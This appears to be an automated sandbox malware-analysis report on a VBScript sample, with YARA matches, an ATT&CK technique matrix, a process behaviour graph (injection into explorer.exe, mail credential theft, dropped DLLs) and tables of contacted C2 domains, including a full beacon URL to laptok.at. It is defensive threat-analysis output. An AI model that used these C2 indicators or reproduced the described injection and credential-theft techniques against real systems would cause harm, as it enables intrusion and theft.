            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Scripting121Credential API Hooking3File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsProcess Injection812Obfuscated Files or Information2LSASS MemorySystem Information Discovery26Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerQuery Registry1SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSecurity Software Discovery331Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
            Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptRootkit4LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion4DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection812Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321161 Sample: 0k4Vu1eOEIhU.vbs Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 69 resolver1.opendns.com 2->69 81 Multi AV Scanner detection for domain / URL 2->81 83 Antivirus detection for dropped file 2->83 85 Multi AV Scanner detection for dropped file 2->85 87 12 other signatures 2->87 9 mshta.exe 19 2->9         started        12 wscript.exe 2 8 2->12         started        15 iexplore.exe 2 66 2->15         started        17 control.exe 2->17         started        signatures3 process4 file5 97 Suspicious powershell command line found 9->97 19 powershell.exe 32 9->19         started        61 C:\Users\user\AppData\Local\...\earmark.avchd, PE32 12->61 dropped 63 C:\Users\user\AppData\Local\...\Ammerman.zip, Zip 12->63 dropped 99 Benign windows process drops PE files 12->99 101 VBScript performs obfuscated calls to suspicious functions 12->101 103 Deletes itself after installation 12->103 105 2 other signatures 12->105 23 iexplore.exe 30 15->23         started        26 iexplore.exe 30 15->26         started        28 iexplore.exe 31 15->28         started        30 rundll32.exe 17->30         started        signatures6 process7 dnsIp8 53 C:\Users\user\AppData\Local\...\gf33rpcq.0.cs, UTF-8 19->53 dropped 55 C:\Users\user\AppData\...\1b1iaete.cmdline, UTF-8 19->55 dropped 89 Injects code into the Windows Explorer (explorer.exe) 19->89 91 Writes to foreign memory regions 19->91 93 Modifies the context of a thread in another process (thread injection) 19->93 95 3 other signatures 19->95 32 explorer.exe 19->32 injected 36 csc.exe 3 19->36         started        39 csc.exe 19->39         started        41 conhost.exe 19->41         started        71 api10.laptok.at 47.241.19.44, 49731, 49732, 49734 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 28->71 file9 signatures10 process11 dnsIp12 65 c56.lepini.at 32->65 67 api3.lepini.at 32->67 73 Tries to steal Mail credentials (via file access) 32->73 75 Changes memory attributes in foreign processes to executable or writable 32->75 77 Writes to foreign memory regions 32->77 79 5 other signatures 32->79 43 RuntimeBroker.exe 32->43 injected 45 RuntimeBroker.exe 32->45 injected 47 cmd.exe 32->47         started        57 C:\Users\user\AppData\Local\...\1b1iaete.dll, PE32 36->57 dropped 49 cvtres.exe 36->49         started        59 C:\Users\user\AppData\Local\...\gf33rpcq.dll, PE32 39->59 dropped 51 cvtres.exe 39->51         started        file13 signatures14 process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\earmark.avchd100%AviraTR/Crypt.XDR.Gen
            C:\Users\user\AppData\Local\Temp\earmark.avchd100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\earmark.avchd46%ReversingLabsWin32.Trojan.Razy

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            c56.lepini.at12%VirustotalBrowse
            api3.lepini.at11%VirustotalBrowse
            api10.laptok.at12%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn90%Avira URL Cloudsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM0%Avira URL Cloudsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            c56.lepini.at
            		47.241.19.44
            		truetrueunknown
            resolver1.opendns.com
            		208.67.222.222
            		truefalse
              		high
              api3.lepini.at
              		47.241.19.44
              		truefalseunknown
              api10.laptok.at
              		47.241.19.44
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9false
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://search.chol.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                		high
                http://www.mercadolivre.com.br/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://search.ebay.de/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                  		high
                  http://www.mtv.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                    		high
                    http://www.rambler.ru/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                      		high
                      http://www.nifty.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                        		high
                        http://www.dailymail.co.uk/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www3.fnac.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                          		high
                          http://buscar.ya.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                            		high
                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                              		high
                              http://constitution.org/usdeclar.txtC:powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://https://file://USER.ID%lu.exe/updpowershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		low
                              http://www.sogou.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://asp.usatoday.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                    		high
                                    http://fr.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                      		high
                                      http://rover.ebay.comexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                        		high
                                        http://in.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                          		high
                                          http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                            		high
                                            http://search.ebay.in/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                              		high
                                              http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://%s.comexplorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://msk.afisha.ru/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000015.00000002.381486406.0000026700001000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://search.rediff.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.daum.net/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://buscar.ozu.es/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.about.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://busca.igbusca.com.br/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.ask.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.cjmall.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.centrum.cz/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.carterandcone.comlexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://suche.t-online.de/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.it/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.amazon.de/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://sads.myspace.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.google.si/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                		high
